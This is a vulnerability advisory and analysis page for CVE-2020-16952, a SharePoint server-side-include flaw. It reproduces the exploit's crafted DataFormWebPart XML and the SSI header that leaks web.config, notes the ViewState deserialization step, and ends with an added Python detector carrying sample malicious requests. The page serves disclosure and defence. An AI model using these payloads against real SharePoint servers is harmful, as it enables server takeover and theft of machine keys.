CVE-2020-16952 — Microsoft SharePoint Remote Code Execution Vulnerabilities
Description
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.
Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.
The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.
Ratings
- Attacker Value: Very High
- Exploitability: High
Technical Analysis
Please see the Rapid7 analysis. A Metasploit module will be released.
Technical Analysis
There were a lot of vulns out this week, a number of which got quite a bit more news cycle attention than this one (lookin’ at you, Bad Neighbor). Unlike a few of those higher-hype bugs, however, this one is an active threat. Like other significant vulnerabilities from this year, the fact that this is authenticated isn’t a barrier for attackers and alas, shouldn’t be a consolation for those tasked with securing SharePoint environments.
@tsellers-r7 has a really great Twitter thread here on the number of publicly exposed, vulnerable SharePoint installations and version/support complexities that defenders may not realize they need to take into account. Metasploit Framework will also have a module out in next week’s release.
General Information
Vendors
- microsoft
Products
- sharepoint enterprise server 2016
- sharepoint foundation 2013
- sharepoint server 2019
Additional Info
Technical Analysis
Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.
Description
On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.
Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.
An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.
Affected products
- Microsoft SharePoint Foundation 2013 Service Pack 1
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Server 2019
Rapid7 analysis
CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.
Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).
```xml
<WebPartPages:DataFormWebPart runat="server">
  <ParameterBindings>
    <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
  </ParameterBindings>
  <xsl>
    <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
      <xsl:param name="ssi" />
      <xsl:template match="/">
        <xsl:value-of select="$ssi" disable-output-escaping="yes" />
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:DataFormWebPart>
```
Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.
```http
360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->
```
Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.
The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():
- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false); + EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);
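Review bot: the fix flips blockServerSideIncludes to true at this one call site only, while the parameter keeps its false default in the VerifyControlOnSafeList signature shown below, so any other caller that omits the argument still gets server-side includes unblocked; consider defaulting the parameter to true and auditing the remaining call sites, or stating in the advisory that only the DataFormWebPart code path is covered.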
```csharp
internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)
```
SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability’s exploitability and weaponize Seeley’s PoC.
Guidance
Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.
For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.
Defenders can detect this exploit variant by identifying HTTP headers containing the string runat="server", as well as auditing SharePoint page creations.
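The detection guidance above, together with the request pattern described in the Rapid7 analysis, as an added example that is not part of the AttackerKB page, Seeley’s advisory, or Rapid7’s own tooling. It assumes a request-logging layer (a reverse proxy or similar) that records method, path, headers and body for each request to the SharePoint front end; the record format, the field names and the three sample requests are all constructed for this example. It goes slightly beyond the page’s single string match: besides runat="server" in any header value, it also flags SSI include directives in headers and PUT bodies that bind a request header into unescaped DataFormWebPart XSL output, so the header name (360Vulcan or any other) does not matter.

```python
"""Flag request records matching the CVE-2020-16952 exploitation pattern.

Added example (assumption: a log layer exposes each request as a dict with
"method", "path", "headers" and "body"); not code from the page or Rapid7.
"""
import re

# Header values carrying server-side markup: the advisory's runat="server"
# string plus SSI include directives.
HEADER_PATTERNS = [
    re.compile(r'runat\s*=\s*"server"', re.IGNORECASE),
    re.compile(r'<!--\s*#include\b', re.IGNORECASE),
]

# Page bodies that bind an XSL parameter to a request header
# (ServerVariable(HTTP_...)) and emit it with output escaping disabled.
BODY_DATAFORM = re.compile(r'<WebPartPages:DataFormWebPart\b', re.IGNORECASE)
BODY_SERVERVARIABLE = re.compile(
    r'Location\s*=\s*"ServerVariable\(HTTP_[^)]*\)"', re.IGNORECASE)
BODY_UNESCAPED = re.compile(
    r'disable-output-escaping\s*=\s*"yes"', re.IGNORECASE)


def inspect_request(req):
    """Return a list of human-readable findings for one request record."""
    findings = []
    for name, value in req.get("headers", {}).items():
        for pat in HEADER_PATTERNS:
            if pat.search(value):
                findings.append(f"header {name!r} matches {pat.pattern}")
    if (req.get("method", "").upper() == "PUT"
            and req.get("path", "").lower().endswith(".aspx")):
        # Page creation/modification: an audit signal per the guidance,
        # not on its own evidence of exploitation.
        findings.append("aspx page written via PUT")
        body = req.get("body", "")
        if (BODY_DATAFORM.search(body) and BODY_SERVERVARIABLE.search(body)
                and BODY_UNESCAPED.search(body)):
            findings.append(
                "DataFormWebPart binds a request header into unescaped XSL output")
    return findings


def scan(requests):
    """Map the index of every suspicious request to its findings."""
    report = {}
    for i, req in enumerate(requests):
        found = inspect_request(req)
        if found:
            report[i] = found
    return report


# Constructed sample records: one benign page view, then the two-request
# sequence from the analysis (page body written via PUT, SSI header on GET).
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/SitePages/Home.aspx",
     "headers": {"User-Agent": "Mozilla/5.0", "Accept": "text/html"},
     "body": ""},
    {"method": "PUT", "path": "/poc.aspx",
     "headers": {"Content-Type": "text/xml"},
     "body": ('<WebPartPages:DataFormWebPart runat="server"><ParameterBindings>'
              '<ParameterBinding Name="ssi" '
              'Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />'
              '</ParameterBindings><xsl><xsl:stylesheet version="1.0">'
              '<xsl:value-of select="$ssi" disable-output-escaping="yes" />'
              '</xsl:stylesheet></xsl></WebPartPages:DataFormWebPart>')},
    {"method": "GET", "path": "/poc.aspx",
     "headers": {"360Vulcan":
                 '<form runat="server" /><!--#include virtual="/web.config"-->'},
     "body": ""},
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_REQUESTS).items():
        for line in found:
            print(f"request {idx}: {line}")
```

The header check is deliberately name-agnostic because the analysis notes the attacker picks the header; the body check is the more specific signal, since a legitimate DataFormWebPart rarely needs to bind a raw request header into unescaped output. Run the PUT finding as an audit trail and alert on the other two.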